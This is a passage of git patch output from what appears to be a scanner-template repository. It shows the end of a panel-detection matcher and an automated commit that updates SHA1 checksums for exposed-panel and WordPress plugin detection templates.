+          - contains(body, 'Web Transfer Client')
+          - status_code == 200
+        condition: and
\ No newline at end of file

From ec5a25185f6f7156c0823bd31e0aa2a875e70f85 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 1 Oct 2023 12:06:57 +0000
Subject: [PATCH 0634/1090] Auto Generated Templates Checksum [Sun Oct  1
 12:06:57 UTC 2023] :robot:

---
 templates-checksum.txt | 404 ++++++++++++++++++++---------------------
 1 file changed, 202 insertions(+), 202 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index c51348fb35..e1ce6e297d 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -3720,7 +3720,7 @@ http/exposed-panels/wordpress-login.yaml:48cee6ec2733086c95bf9fdd46469f43cbe38ee
 http/exposed-panels/workresources-rdp.yaml:1e7b26e95298777a13d8b6a05c27e8571c3a953b
 http/exposed-panels/workspace-one-uem.yaml:052c6675f094f95cc30aaca8ada549e2425ebf86
 http/exposed-panels/wowza-streaming-engine.yaml:e956aec0e3865a780df4d3060a56873d230267fa
-http/exposed-panels/ws_ftp-server-web-transfer.yaml:528498596b005546530b1e71c669c1dd014cf95d
+http/exposed-panels/ws_ftp-server-web-transfer.yaml:ff90a46d79912591a852d9d0fbb4703503e55fce
 http/exposed-panels/wso2-management-console.yaml:aed80639527071b4d80f236720eb2b415a7301a9
 http/exposed-panels/xds-amr-status.yaml:73248791595d3a90634169c59a057ff80d0aba72
 http/exposed-panels/xeams-admin-console.yaml:8a2dff2e6626031ab304277ca415a8ee3834b1e8
@@ -5870,218 +5870,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:924927777d59fef8a11d68dda86b4a14086ddfbd
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:1abb8c2db0b2be269d5ff198fee5064e7cba9e18
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
